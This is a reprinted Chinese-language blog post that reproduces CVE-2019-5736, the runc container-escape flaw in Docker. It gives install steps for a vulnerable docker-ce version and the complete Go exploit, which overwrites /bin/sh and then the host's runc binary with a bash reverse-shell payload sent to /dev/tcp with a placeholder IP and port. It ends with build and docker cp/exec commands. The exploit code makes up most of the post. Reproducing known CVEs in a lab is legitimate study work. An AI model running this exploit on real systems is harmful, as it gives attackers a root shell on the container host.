碼上快樂

相關內容    簡體    繁體

CVE-2019-5736復現

本文轉載自   查看原文   2021-04-25 21:04   223    漏洞復現

CVE-2019-5736復現 docker逃逸漏洞

docker從容器中逃逸,訪問到宿主機的資源甚至獲得宿主機的權限就是docker逃逸

環境配置

sudo apt-get update

apt-cache madison docker-ce 查看可用的docker版本

sudo apt-get install docker-ce=18.06.1ce3-0~ubuntu 安裝docker

漏洞復現

docker版本

image-20210425104924623

隨便拉一個redis服務

image-20210425105134049

在個人主機上安裝go環境

poc

package main

import (
	"fmt"
	"io/ioutil"
	"os"
	"strconv"
	"strings"
)

// This is the line of shell commands that will execute on the host
var payload = "#!/bin/bash \n bash -i >& /dev/tcp/xxxxxxxip/xxxxport 0>& 1"

func main() {
	// First we overwrite /bin/sh with the /proc/self/exe interpreter path
	fd, err := os.Create("/bin/sh")
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Fprintln(fd, "#!/proc/self/exe")
	err = fd.Close()
	if err != nil {
		fmt.Println(err)
		return
	}
	fmt.Println("[+] Overwritten /bin/sh successfully")

	// Loop through all processes to find one whose cmdline includes runcinit
	// This will be the process created by runc
	var found int
	for found == 0 {
		pids, err := ioutil.ReadDir("/proc")
		if err != nil {
			fmt.Println(err)
			return
		}
		for _, f := range pids {
			fbytes, _ := ioutil.ReadFile("/proc/" + f.Name() + "/cmdline")
			fstring := string(fbytes)
			if strings.Contains(fstring, "runc") {
				fmt.Println("[+] Found the PID:", f.Name())
				found, err = strconv.Atoi(f.Name())
				if err != nil {
					fmt.Println(err)
					return
				}
			}
		}
	}

	// We will use the pid to get a file handle for runc on the host.
	var handleFd = -1
	for handleFd == -1 {
		// Note, you do not need to use the O_PATH flag for the exploit to work.
		handle, _ := os.OpenFile("/proc/"+strconv.Itoa(found)+"/exe", os.O_RDONLY, 0777)
		if int(handle.Fd()) > 0 {
			handleFd = int(handle.Fd())
		}
	}
	fmt.Println("[+] Successfully got the file handle")

	// Now that we have the file handle, lets write to the runc binary and overwrite it
	// It will maintain it's executable flag
	for {
		writeHandle, _ := os.OpenFile("/proc/self/fd/"+strconv.Itoa(handleFd), os.O_WRONLY|os.O_TRUNC, 0700)
		if int(writeHandle.Fd()) > 0 {
			fmt.Println("[+] Successfully got write handle", writeHandle)
			writeHandle.Write([]byte(payload))
			return
		}
	}
}

CGO_ENABLED=0 GOOS=linux GOARCH=amd64 go build main.go編譯payload

docker cp main 503:/home

docker exec -it 503 /bin/bash

image-20210425110955015


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 docker逃逸漏洞復現(CVE-2019-5736) Docker逃逸--runC容器逃逸漏洞(CVE-2019-5736) CVE-2019-0708漏洞復現 CVE-2019-0232漏洞復現 CVE-2019-0708復現之旅 cve2019-0708漏洞復現 CVE-2019-11043漏洞分析與復現 cve-2019-1388復現+爛土豆+CVE-2019-0803 PHP遠程代碼執行漏洞復現(CVE-2019-11043) CVE-2019-0193 遠程命令執行-漏洞復現
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM